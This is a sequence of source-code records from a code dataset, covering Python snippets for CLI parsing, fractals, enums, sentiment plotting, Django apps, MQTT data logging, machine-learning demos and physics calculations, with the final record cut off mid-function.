UTC)\")\n outputs = parser.add_argument_group(\"output options\")\n outputs.add_argument(\n \"-d\", \"--details\",\n action=\"store_true\",\n help=\"return detailed results for all securities instead of aggregating to \"\n \"account/order ref level (only supported for a single account and order ref \"\n \"at a time)\")\n outputs.add_argument(\n \"--csv\",\n action=\"store_true\",\n help=\"return a CSV of PNL (default is to return a PDF \"\n \"performance tear sheet)\")\n outputs.add_argument(\n \"-o\", \"--outfile\",\n metavar=\"OUTFILE\",\n dest=\"filepath_or_buffer\",\n help=\"filename to write the data to (default is stdout)\")\n parser.set_defaults(func=\"quantrocket.blotter._cli_download_pnl\")\n\n #parser = _subparsers.add_parser(\"rollover\", help=\"generate orders to rollover futures contracts based on rollover rules\")\n #parser.add_argument(\"-s\", \"--strategies\", nargs=\"*\", metavar=\"CODE\", help=\"limit to these strategies\")\n #parser.add_argument(\"-a\", \"--accounts\", nargs=\"*\", metavar=\"ACCOUNT\", help=\"limit to these accounts\")\n #parser.add_argument(\"-r\", \"--rules\", nargs=\"*\", metavar=\"KEY:VALUE\", help=\"rollover rules as multiple key-value pairs in relativedelta format (e.g. days=-8) (omit to use rollover rules defined in master service)\")\n #parser.set_defaults(func=\"quantrocket.blotter.rollover_positions\")\n\n #parser = _subparsers.add_parser(\"close\", help=\"generate orders to close positions\")\n #parser.add_argument(\"-s\", \"--strategies\", nargs=\"*\", metavar=\"CODE\", help=\"limit to these strategies\")\n #parser.add_argument(\"-c\", \"--conids\", nargs=\"*\", metavar=\"CONID\", help=\"limit to these conids\")\n #parser.add_argument(\"-a\", \"--accounts\", nargs=\"*\", metavar=\"ACCOUNT\", help=\"limit to these accounts\")\n #parser.add_argument(\"-o\", \"--order\", nargs=\"+\", metavar=\"FIELD:VALUE\", help=\"order details as JSON or as multiple key-value pairs (e.g. orderType:MKT tif:DAY)\")\n #parser.add_argument(\"--oca\", dest=\"oca_suffix\", metavar=\"SUFFIX\", help=\"create OCA group containing client ID, order ID, and this suffix (run this command multiple times with this option to create OCA orders)\")\n #parser.set_defaults(func=\"quantrocket.blotter.close_positions\")\n","sub_path":"quantrocket/cli/subcommands/blotter.py","file_name":"blotter.py","file_ext":"py","file_size_in_byte":13083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"340351734","text":"import math\n\nimport MonochromeBitmap\n\nclass Koch:\n\tdef __init__(self):\n\t\tself.x = 0\n\t\tself.y = 0\n\t\tself.point = [(0.0,0.0)]\n\t@classmethod\n\tdef draw(self,level,size):\n\t\tk = Koch()\n\t\tdef drawCurve(level,angle,size):\n\t\t\tif level < 1:\n\t\t\t\tk.x,k.y = k.x + math.cos(angle) * size,k.y + math.sin(angle) * size\n\t\t\t\tk.point.append((k.x,k.y))\n\t\t\t\treturn\n\t\t\ts = size / 3\n\t\t\tdrawCurve(level - 1,angle,s)\n\t\t\tangle += math.pi / 3\n\t\t\tdrawCurve(level - 1,angle,s)\n\t\t\tangle -= math.pi * 2 / 3\n\t\t\tdrawCurve(level - 1,angle,s)\n\t\t\tangle += math.pi / 3\n\t\t\tdrawCurve(level - 1,angle,s)\n\t\tdrawCurve(level,0,float(size))\n\t\treturn k.point\n\t@classmethod\n\tdef drawBitmap(self,level,width):\n\t\tpoint = Koch.draw(level,width)\n\t\twidth = int(round(point[-1][0])) + 1\n\t\theight = int(round(point[len(point) / 2][1])) + 1\n\t\tbitmap = MonochromeBitmap.MonochromeBitmap(width,height)\n\t\tfor x,y in point:\n\t\t\tbitmap.set(int(round(x)),int(round(y)))\n\t\treturn bitmap.bitmap()\n","sub_path":"Koch.py","file_name":"Koch.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"273633421","text":"\r\n# 定义一个class类型,然后,每个常量都是class的一个唯一实例。Python提供了Enum类来实现这个功能\r\n\r\nfrom enum import Enum,unique\r\n\r\n# Month = Enum('month', ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'))\r\nMonth = Enum('month', ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'))\r\nfor name, member in Month.__members__.items():\r\n print(name, '=>', member, ',', member.value)\r\nprint(Month.Jan)\r\n\r\n\r\nclass Weekday(Enum):\r\n Sun = 0\r\n Mon = 1\r\n Tue = 2\r\n Wed = 3\r\n Thu = 4\r\n Fri = 5\r\n Sat = 6\r\n\r\nprint(Weekday.Sun)\r\nprint(Weekday['Sun'])\r\nprint(Weekday.Sun.value)\r\n\r\n\r\nclass Gender(Enum):\r\n Male = 0\r\n Female = 1\r\n\r\nclass Student(object):\r\n def __init__(self, name, gender):\r\n self.name = name\r\n if isinstance(gender,Gender):\r\n self.gender = gender\r\n else:\r\n raise ValueError('error')\r\n\r\ns = Student('duan',Gender.Male)\r\nprint(s.gender)\r\nprint(s.gender == Gender.Male)","sub_path":"Pscrapy/PycharmProjects/Reptile/枚举类/枚举.py","file_name":"枚举.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"274839878","text":"import json\r\nimport textblob as tb\r\nimport matplotlib.pyplot as plot\r\nimport wordcloud as wc\r\n#pull tweet data out of json file\r\ntweetFile = open('tweets_small.json', 'r')\r\ntweetData = json.load(tweetFile)\r\ntweetFile.close()\r\n#empyt lists\r\npolarity=[]\r\nsubjectivity=[]\r\nsumP=0.0\r\nsumS=0.0\r\n\r\nfor i in tweetData:\r\n tB = tb.TextBlob(i[\"text\"])\r\n #print(tB)#check\r\n #print(tB.polarity)#check\r\n polarity.append(tB.polarity)\r\n sumP+=tB.polarity\r\n subjectivity.append(tB.subjectivity)\r\n sumS+=tB.subjectivity\r\n#print(polarity)\r\n#print(subjectivity)\r\n# print(sumP)\r\n#print(sumS)\r\navgp=sumP/len(polarity)\r\navgs=sumS/len(subjectivity)\r\nprint(\"Polarity average: \", avgp)\r\nprint(\"Subjectivity average: \", avgs)\r\n\r\n#make histogram\r\n#plot.hist(whole data set, bin, color)\r\nplot.hist(polarity, bins = [-1, -.35, .35, 1], color = \"blue\")\r\n#make title\r\nplot.title(\"Polarity Plot\")\r\nplot.xlabel(\"Polarity\")\r\nplot.ylabel(\"Amount\")\r\n#print histogram .show\r\nplot.show()\r\n#subjectivity histogram\r\nplot.hist(subjectivity, bins = [0, .30, .65, 1], color = \"green\")\r\nplot.title(\"Subjectivity Plot\")\r\nplot.xlabel(\"Subjectivity\")\r\nplot.ylabel(\"Amount\")\r\nplot.show()\r\n\r\n#scatter plot: scatter(x, y, s=None, c=None, marker=None, cmap=None, norm=None, vmin=None, vmax=None, alpha=None, linewidths=None, verts=None, edgecolors=None, *, plotnonfinite=False, data=None, **kwargs)\r\nplot.scatter(subjectivity, polarity, color=\"lightpink\")\r\nplot.title(\"Scatter Plot\")\r\nplot.xlabel(\"Subjectivity\")\r\nplot.ylabel(\"Polarity\")\r\nplot.show()\r\n","sub_path":"twittertextblob.py","file_name":"twittertextblob.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"430829543","text":"import trie, sqlite3, gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\nclass DataHandler:\n \"\"\"Class to handle data from sqlite database\"\"\"\n def __init__(self):\n \"\"\"Constructor;\n myTrie - Trie to predict words\n myConnection, myCursor - to handle sqlite\n maxnum - index of string\"\"\"\n self.myTrie = trie.Trie()\n '''Connecting to sqlite and creating table'''\n self.myConnection = sqlite3.connect('myDatabase.db')\n self.myCursor = self.myConnection.cursor()\n self.myCursor.execute(\"\"\"create table if not exists myStrings (stringID int primary key not NULL, string text)\"\"\")\n self.myCursor.execute(\"\"\"select * from myStrings\"\"\")\n self.maxnum = -1\n '''Building trie'''\n for row in self.myCursor:\n self.myTrie.addWord(row[1])\n self.maxnum = row[0]\n '''Trie built'''\n self.maxnum += 1\n\n def getPrediction(self, text):\n \"\"\"Returns ListStore containing prediction\"\"\"\n liststore = Gtk.ListStore(str)\n if text == \"\":\n return liststore\n temp2 = text\n text = text.strip().split()\n temp = \"\"\n for i in text[:-1]:\n temp+=i\n temp+=\" \"\n text = text[-1]\n suffix=self.myTrie.predictWord(text)\n if suffix != \"\":\n if temp != \" \":\n liststore.append([temp + text + suffix])\n else:\n liststore.append([text+suffix])\n else:\n predict = \"\"\n tofind = text\n while predict == \"\" and len(tofind) is not 0:\n tofind = tofind[:-1]\n predict=self.myTrie.predictWord(tofind)\n \n if temp != \" \":\n liststore.append([temp + text + \" Did You Mean \" + tofind + predict])\n else:\n liststore.append([text + \" Did You Mean \" + tofind + predict])\n return liststore\n\n def addUnknownWord(self, text):\n \"\"\"Adds unknown text to trie and sqlite\"\"\"\n text = text.split()\n for word in text:\n self.myTrie.addWord(word)\n self.myCursor.execute(\"\"\"insert into myStrings values(?, ?)\"\"\", (self.maxnum, word))\n self.maxnum+=1\n self.myConnection.commit()\n\n def close(self):\n \"\"\"Called when operations are done\"\"\"\n myCursor.close()\n","sub_path":"datahandler.py","file_name":"datahandler.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"15031635","text":"import os\n\nimport build_functions as bf\nfrom config import Config\n\n\ndef start_build():\n config = Config()\n\n while True:\n # 选择游戏\n game = bf.choose_game(config)\n print(game)\n\n # 选择渠道\n channels = bf.choose_channels(config, game)\n\n # 开始批量构建\n for channel in channels:\n bf.build(config, game, channel)\n\n\nstart_build()\n","sub_path":"build_apk.py","file_name":"build_apk.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"526256042","text":"from __future__ import unicode_literals\nimport urlparse\n\nfrom django.db import models\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass UrlMixin(models.Model):\n class Meta:\n abstract = True\n\n def get_url(self):\n if hasattr(self.get_url_path, \"dont_recurse\"):\n raise NotImplementedError\n try:\n path = self.get_url_path()\n except NotImplementedError:\n raise\n website_url = getattr(\n settings, \"DEFAULT_WEBSITE_URL\",\n \"http://127.0.0.1:8000\"\n )\n return website_url + path\n\n def get_url_path(self):\n if hasattr(self.get_url, \"dont_recurse\"):\n raise NotImplementedError\n try:\n url = self.get_url()\n except NotImplementedError:\n raise\n bits = urlparse.urlparse(url)\n return urlparse.urlunparse((\"\", \"\") + bits[2:])\n get_url_path.dont_recurse = True\n\n def get_absolute_url(self):\n return self.get_url_path()\n\n\nclass CreationModificationDateMixin(models.Model):\n created = models.DateTimeField(\n _(\"Creation Date and Time\"),\n editable=False,\n auto_now_add=True,\n )\n modified = models.DateTimeField(\n _(\"Modification Date and Time\"),\n null=True,\n editable=False,\n auto_now=True,\n )\n\n def save(self, *args, **kwargs):\n super(CreationModificationDateMixin, self).save(*args, **kwargs)\n save.alters_data = True\n\n class Meta:\n abstract = True\n","sub_path":"ABToast/utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"571206857","text":"\"\"\"\nGiven 2 positive integers x and y, compute x/y by just using addition, subtraction and bit shifting\noperations.\n\nQuestion apparently asked to Ravi and Ashwin from IK at Facebook.\nEPI Page 48, 5.6\n\n\"\"\"\n\n\ndef divide(x, y):\n \"\"\"\n Key insight: Find maximum k such that 2**k * y <= x;\n Cache the value of 2**k. For subsequent iterations k will always be lesser.\n quotient += 2**k\n\n Time complexity: If there are n-bits representing x and y, it needs n-iterations with each\n iteration having bit shifting and O(1) time, so total complexity is O(n).\n :param x:\n :param y:\n :return: Quotient from x/y\n \"\"\"\n res = 0\n power = 32\n y_power = y << power\n\n while x >= y:\n while y_power > x:\n power -= 1\n y_power >>= 1\n\n x -= y_power\n res += 1 << power\n return res\n\n\nif __name__ == '__main__':\n print(divide(11, 2)) # 5\n print(divide(49, 7)) # 7\n","sub_path":"app/puzzles_and_math/integer_division.py","file_name":"integer_division.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"129411057","text":"#!/usr/bin/python\nimport yaml\nimport sys\nimport getopt\nimport argparse\n\n\nclass KSKYaml:\n def __init__(self, argv):\n try:\n opts, args = getopt.getopt(argv, \"hd:f:\", [\"data=\", \"file=\"])\n self.opts = opts\n self.args = args\n for opt, arg in opts:\n if opt == '-h':\n self.getHelp()\n elif opt in (\"-f\", \"--file\"):\n self.setFile(arg)\n elif opt in (\"-d\", \"--data\"):\n self.setData(arg)\n if arg != '':\n self.YamlDump(self.getFile(), self.getData())\n except getopt.GetoptError:\n self.getHelp()\n sys.exit(2)\n\n def setFile(self, files):\n self.files = files\n\n def getFile(self):\n return self.files\n\n def setData(self, data):\n self.data = data\n\n def getData(self):\n return self.data\n\n def YamlDump(self, files, data):\n with open(files, 'w') as f:\n yaml.dump(YamlParse(), f, default_flow_style=False, width=2)\n\n def getHelp(self):\n parser = argparse.ArgumentParser(prog='KSKYaml',\n usage='%(prog)s [options]')\n parser.add_argument('--file', nargs='?', help='foo help')\n parser.add_argument('-f', nargs='?', help='foo help')\n parser.add_argument('-d', nargs='?', help='bar help')\n parser.add_argument('--data', nargs='?', help='bar help')\n parser.print_help()\n\nif __name__ == \"__main__\":\n test = KSKYaml(sys.argv[1:])\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"289614428","text":"import torchaudio\nimport random\nimport torch\n\nclass FileLoadingSoxEffects(torch.nn.Module):\n def __init__(self, initial_sample_rate=44100, final_sample_rate=44100, random_pre_resampling=False):\n super().__init__()\n self.random_pre_resampling = random_pre_resampling\n self.effects_before = [\n [\"remix\", \"-\"],\n [\"gain\", \"-n\"],\n ]\n\n self.effects_after = []\n self.sr_change = initial_sample_rate != final_sample_rate\n if self.sr_change or random_pre_resampling:\n self.effects_after.extend([\n [\"rate\", str(final_sample_rate)],\n [\"pad\", \"0\", \"0.3\"]\n ])\n self.initial_sample_rate = initial_sample_rate\n \n\n def forward(self, samples: torch.Tensor):\n effects = [*self.effects_before]\n if random.random() < 0.3:\n if self.random_pre_resampling:\n effects.append([\"rate\", str(random.randint(8000, 16000))])\n effects.extend(self.effects_after)\n elif self.sr_change:\n effects.extend(self.effects_after)\n return torchaudio.sox_effects.apply_effects_tensor(\n samples, self.initial_sample_rate, effects)","sub_path":"src/datasets/diskds/sox_transforms.py","file_name":"sox_transforms.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"233186388","text":"# -*- coding: utf-8 -*-\n\nfrom django import forms\nfrom django.forms.formsets import formset_factory\nfrom django.contrib.admin.widgets import AdminDateWidget, \\\n FilteredSelectMultiple\nfrom statistics.models import Action, Dealer\nfrom report.data_collection import PERIOD_TYPE_CHOICE\n\n\nclass KmClientManagerForm(forms.Form):\n \"\"\"Форма фильтрации данных для получения отчета\n\n CLIENT_FILTER_FIELDS - набор полей, которые соответствуют полям из модели\n Client (названия ДОЛЖНЫ СОВПАДАТЬ)\n порядок следования полей формы (login, user_name, computer_name) определяет\n порядок зависимостей при подгрузке чойсов на страницу\n\n \"\"\"\n CLIENT_FILTER_FIELDS = ('login', 'user_name', 'computer_name')\n\n date_from = forms.DateField(label=u'Дата от', widget=AdminDateWidget)\n date_to = forms.DateField(label=u'Дата до', widget=AdminDateWidget)\n period_type = forms.ChoiceField(choices=PERIOD_TYPE_CHOICE,\n label=u'Группировка')\n amount_of_pc = forms.IntegerField(label=u'Доступ с .. и более компьютеров',\n required=False, min_value=0)\n dealer = forms.ModelMultipleChoiceField(\n Dealer.objects.order_by('name'), label=u'Дилер', required=False,\n widget=FilteredSelectMultiple(u'Дилеры', is_stacked=False)\n )\n\n login = forms.MultipleChoiceField(label=u'Логин', required=False)\n user_name = forms.MultipleChoiceField(\n label=u'Имя пользователя', required=False\n )\n computer_name = forms.MultipleChoiceField(\n label=u'Имя компьютера', required=False\n )\n\n def clean_period_type(self):\n return int(self.cleaned_data['period_type'])\n\n def __init__(self, *args, **kwargs):\n # Выборка чойсов для полей в виде словаря ключ - название поля:\n # {'login': [('a','a'),('b','b')] ... }\n filter_choices = kwargs.pop('filter_choices', None)\n\n super(KmClientManagerForm, self).__init__(*args, **kwargs)\n\n # Устанавливаем для дополнительных полей фильтра css классы\n for field_name in self.CLIENT_FILTER_FIELDS:\n self.fields[field_name].widget.attrs['class'] = \\\n 'client_filter_fields'\n\n # Инициализируем чойсы для полей на основе тех данных, что переданы в\n # параметрах\n if filter_choices and isinstance(filter_choices, dict):\n for field_name, choices in filter_choices.iteritems():\n self.fields[field_name].choices = choices\n\n class Media(object):\n js = ('report/js/extended_filtering.js',)\n\n\nclass ActionForm(forms.Form):\n negative = forms.BooleanField(label=u'Не', required=False)\n action = forms.MultipleChoiceField(\n choices=Action.objects.order_by('name').values_list('id', 'name'),\n label=u'Событие',\n required=True,\n )\n UNION_AND = 'and'\n UNION_OR = 'or'\n UNION_CHOICE = (\n (UNION_AND, u'И'),\n (UNION_OR, u'Или')\n )\n union_type = forms.ChoiceField(\n choices=UNION_CHOICE,\n initial='and',\n label=u'Соединение',\n )\n\n class Media(object):\n js = ('report/js/formset.js',)\n\nActionFormset = formset_factory(ActionForm)","sub_path":"modules/report/forms/kmclient_manage.py","file_name":"kmclient_manage.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"301515544","text":"from persona import Persona\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\n#SIMULATION PARAMETERS\nn=300 #number of individuals\np_infectadas = 1 #percentage of infected people at the beginning of the simulation (0-100%)\nr_contagio=10 #radius of transmission in pixels (0-100)\np_contagio=100 #probability of transmission in percentage (0-100%)\np_aislamiento =50 #percentage of the people in quarantine (0-100%)\nt_contagiado=100 #time taken to recover in number of frames (0-infinity)\n\n\ncontagiados=0\npersonas=[]\n\n#creating all the individuals in random positions. Infecting some of them\nfor i in range(n):\n p = Persona(i,np.random.random()*100, np.random.random()*100,\n np.random.random() * 100, np.random.random() * 100,\n (np.random.random()+0.5)*100,t_contagiado, False)\n\n if np.random.random()\\d+)/$', views.planDetails, name=\"details\"),\n url(r'^(?P\\d+)/goal/(?P\\d+)/$', views.planForGoal, name=\"planForGoal\"),\n url(r'^(?P\\d+)/role/(?P\\d+)/$', views.planForRole, name=\"planForRole\"),\n)\n","sub_path":"actionplan/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"523231042","text":"from django.shortcuts import render, redirect\n\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\n\nfrom .forms import StringTextForm, UploadFileForm, RegistrationForm, AddDeleteForm\nfrom .textChecker import CheckedText, gives_file_text, creates_words_list\nfrom .models import PersonalData\n\n\ndef choice(request):\n \"\"\"\n Displays main page with choices of login/registration and choices\n how to provide data to the program.\n \"\"\"\n return render(request, 'textChecker/index.html')\n\n\ndef file_input(request):\n \"\"\"Displays page with form to upload a file in txt/docx/pdf format.\"\"\"\n if request.method == 'POST':\n form = UploadFileForm(request.POST, request.FILES)\n if form.is_valid():\n result = gives_file_text(request.FILES['file'])\n if result == 'Wrong file format!':\n form = UploadFileForm()\n return render(request,\n 'textChecker/input.html',\n {'form': form,\n 'error': 'Zły format pliku, spróbuj ponownie'})\n if not request.user.is_anonymous():\n user_wrong_words = request.user.personaldata.wrong_words\n finalResult = CheckedText(result, user_wrong_words)\n else:\n finalResult = CheckedText(result)\n return render(request, 'textChecker/text_output.html',\n {'result': finalResult})\n\n form = UploadFileForm()\n return render(request, 'textChecker/input.html', {'form': form})\n\n\ndef text_input(request):\n \"\"\"Displays page with form to upload a text.\"\"\"\n if request.method == \"POST\":\n form = StringTextForm(request.POST)\n if form.is_valid():\n stringText = request.POST['text']\n if not request.user.is_anonymous():\n user_wrong_words = request.user.personaldata.wrong_words\n result = CheckedText(stringText, user_wrong_words)\n else:\n result = CheckedText(stringText)\n return render(request, 'textChecker/text_output.html',\n {'result': result})\n\n form = StringTextForm()\n return render(request, 'textChecker/input.html', {'form': form})\n\n\n@login_required\ndef wrong_words(request):\n \"\"\"\n Displays incorrect elements to search and enables user to\n add or remove elements from his own personal list.\n \"\"\"\n if request.method == \"POST\":\n form = AddDeleteForm(request.POST)\n if form.is_valid():\n choice = request.POST['select']\n word = request.POST['word']\n obj = PersonalData.objects.get(user=request.user)\n if choice == 'Add':\n obj.wrong_words += '\\n' + word.strip()\n elif choice == 'Delete':\n if word in obj.wrong_words:\n obj.wrong_words = obj.wrong_words.replace('\\n' + word, '')\n obj.save()\n result = request.user.personaldata.wrong_words\n return render(request, 'textChecker/wrong_words_changed.html',\n {'result': result})\n\n user_wrong_words = request.user.personaldata.wrong_words\n # Using external function from textChecker module.\n wrongWordsList = creates_words_list('incorrectWords.txt')\n form = AddDeleteForm()\n return render(request, 'textChecker/wrong_words.html',\n {'user_wrong_words': user_wrong_words,\n 'wrong_words': wrongWordsList,\n 'form': form})\n\n\ndef register_page(request):\n \"\"\"Page for new user registration.\"\"\"\n if request.method == 'POST':\n form = RegistrationForm(request.POST)\n if form.is_valid():\n User.objects.create_user(username=form.cleaned_data['username'],\n password=form.cleaned_data['password1'],\n email=form.cleaned_data['email'])\n return render(request, 'registration/register_success.html',\n {'user': form.cleaned_data['username']})\n else:\n return render(request, 'registration/register.html', {'form': form})\n\n form = RegistrationForm()\n return render(request, 'registration/register.html', {'form': form})\n\n","sub_path":"textChecker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"171042346","text":"import random\nclass Solution:\n def findMedianSortedArrays(self, nums1, nums2):\n p1, p2 = 0, 0\n while p2 < len(nums2):\n while p1 < len(nums1) and nums1[p1] < nums2[p2]:\n p1 += 1\n if p1 == len(nums1):\n nums1 = nums1 + [nums2[p2]]\n else:\n nums1 = nums1[:p1] + [nums2[p2]] + nums1[p1:]\n p2 += 1\n # print(nums1)\n\n if len(nums1) % 2 == 0:\n return (nums1[int(len(nums1) / 2) - 1] + nums1[int(len(nums1) / 2)]) / 2\n else:\n return nums1[int(len(nums1) / 2)]\n\nif __name__ == '__main__':\n sol = Solution()\n nums1 = [1, 3]\n nums2 = [2, 3]\n nums1 = sorted([random.randint(int(10e5)*-1, int(10e5)) for _ in range(1000)])\n nums2 = sorted([random.randint(int(10e5)*-1, int(10e5)) for _ in range(1000)])\n \n print(nums1)\n\n print(nums2)\n\n print(sol.findMedianSortedArrays(nums1, nums2))\n","sub_path":"source code/4. Median of Two Sorted Arrays.py","file_name":"4. Median of Two Sorted Arrays.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"603869882","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns\nfrom django.conf.urls import url \nfrom blog import views\n\nurlpatterns = patterns('',\n url(r'^$', views.home, name ='home'),\n # url(r'^register/$', views.register, name ='register'),\n # url(r'^login/$', views.user_login, name='login'),\n # url(r'^logout/$', views.user_logout, name='logout'),\n url(r'^post/(?P[0-9]+)/$', views.post_detail, name ='post_detail'),\n\t url(r'^post/new/$', views.post_new, name='post_new'),\n\t url(r'^post/(?P[0-9]+)/edit/$', views.post_edit, name ='post_edit'),\n\t url(r'^post/(?P[0-9]+)/delete/$', views.post_delete, name ='post_delete'),\n\t url(r'^post/(?P[0-9]+)/comment/$', views.add_comment_to_post, name ='add_comment_to_post'),\n\t url(r'^post/(?P[0-9]+)/publish/$', views.post_publish, name ='post_publish'),\n\t url(r'^comment/(?P[0-9]+)/remove/$', views.comment_remove, name ='comment_remove'),\n\t url(r'^comment/(?P[0-9]+)/approve/$', views.comment_approve, name ='comment_approve'),\n\t \n )","sub_path":"django_blog/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"265854513","text":"from time import strftime # Aikaleimakirjasto\n\nfrom MeteorClient import MeteorClient\n\nmeteor = MeteorClient('ws://127.0.0.1:3000/websocket')\nmeteor.connect()\n\nimport paho.mqtt.client as mqtt\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n #print(\"Connected with result code \"+str(rc))\n\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n client.subscribe(\"sensors/#\")\n\n# The callback for when a PUBLISH message is received from the server.\n\ndef insert_callback(error, data):\n if error:\n print(error)\n return\n print(data)\n\ndef on_message(client, userdata, msg):\n\n if ( msg.topic == \"/sensors/sade\" ):\n print(\"sade \" + msg.payload.decode(\"utf-8\"))\n meteor.insert('sade', {'title': msg.payload.decode(\"utf-8\"),\n 'aikaleima': strftime(\"%m/%d/%Y %H:%M\")},callback=insert_callback)\n\n if ( msg.topic == \"/sensors/tsuun\" ):\n print(\"tuulensuunta \" + msg.payload.decode(\"utf-8\"))\n meteor.insert('tuulensuunta', {'title': msg.payload.decode(\"utf-8\"),\n 'aikaleima': strftime(\"%m/%d/%Y %H:%M\")},callback=insert_callback)\n\n if ( msg.topic == \"/sensors/tnop\" ):\n print(\"tuulennopeus \" + msg.payload.decode(\"utf-8\"))\n meteor.insert('tuulennopeus', {'title': msg.payload.decode(\"utf-8\"),\n 'aikaleima': strftime(\"%m/%d/%Y %H:%M\")},callback=insert_callback)\n\n if ( msg.topic == \"/sensors/lampo\" ):\n print(\"lampotila \" + msg.payload.decode(\"utf-8\"))\n meteor.insert('lampotila', {'title': msg.payload.decode(\"utf-8\"),\n 'aikaleima': strftime(\"%m/%d/%Y %H:%M\")},callback=insert_callback)\n\n if ( msg.topic == \"/sensors/ikosteus\" ):\n print(\"ilmankosteus \" + msg.payload.decode(\"utf-8\"))\n meteor.insert('ilmankosteus',\n {'title': msg.payload.decode(\"utf-8\"),\n 'aikaleima': strftime(\"%m/%d/%Y %H:%M\")},callback=insert_callback)\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\n\n\nclient.connect(\"10.10.206.157\", 1883, 60)\n\n# Blocking call that processes network traffic, dispatches callbacks and\n# handles reconnecting.\n# Other loop*() functions are available that give a threaded interface and a\n# manual interface.\n\nclient.loop_forever()\n\n\n\n","sub_path":"SääasemaPython.py","file_name":"SääasemaPython.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"648428687","text":"#testing1\r\n#MACHINE LEARNING: es una serie de algoritmos que hacen que tu dispositivos o aplicacion tengan inteligencia\r\n#Tensor flow: redes neuronales\r\n#sklearn: logical core de machine learning\r\n\r\n#Linear Regression\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn.datasets import load_boston\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression, Ridge\r\n\r\nboston = load_boston()\r\n\r\nprint(str(boston.keys()),end=\"\\n\\n\")\r\n\r\n#print(boston.data)\r\nprint(boston.target.shape)\r\n\r\nX_ent, X_test,y_ent, y_test = train_test_split(boston.data,boston.target)\r\nprint(\"ready...\")\r\nprint(y_test.shape)\r\n\r\nknn = KNeighborsRegressor(n_neighbors=3)\r\n\r\nknn.fit(X_ent,y_ent)\r\n\r\nprint(knn.score(X_test,y_test))\r\n\r\ninput()\r\n","sub_path":"teting1.py","file_name":"teting1.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"61099016","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 20 15:08:36 2017\n\n@author: Seán Brennan\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n#------------------------------------------------------------------------------\n\nmass_sun = 1.989e30\nmass_earth = 5.672e24\nradius_sun = 695700000\nradius_earth = 6371e3\nmass_ISS = 419455\ng = 6.673e-11\nAU = 15.0e10\nT = 5778\nsig = 5.67e-8\nc = 3e8\n#------------------------------------------------------------------------------\n\"\"\"check using data from ISS:\n> r is 400km\n> vel(r) is 7.66km/s\n> period(r) is 94 mins\n\"\"\"\ndef vel(r):\n return np.sqrt(g*mass_sun*(1/(r+radius_sun)))\ndef acc(r):\n return g*mass_sun*(1/(r+radius_sun)**2)\ndef period(r):\n return 2*np.pi*np.sqrt(r**3/(g*mass_sun))\nsec_to_year=1/(60*60*24*365)\ndef f_grav(r):\n return (g*mass_sun*mass_ISS)/r**2 \ndef flux(r):\n L = 4*np.pi*(radius_sun**2)*sig*T**4\n F = L / (4*np.pi*r**2)\n return F\ndef lor(v): #lorrentz factor\n return np.sqrt(1-(v)**2/(c)**2)\n \n#------------------------------------------------------------------------------\ndef dist(x,y): # defining pythagorus therom for distance\n return (x**2 + 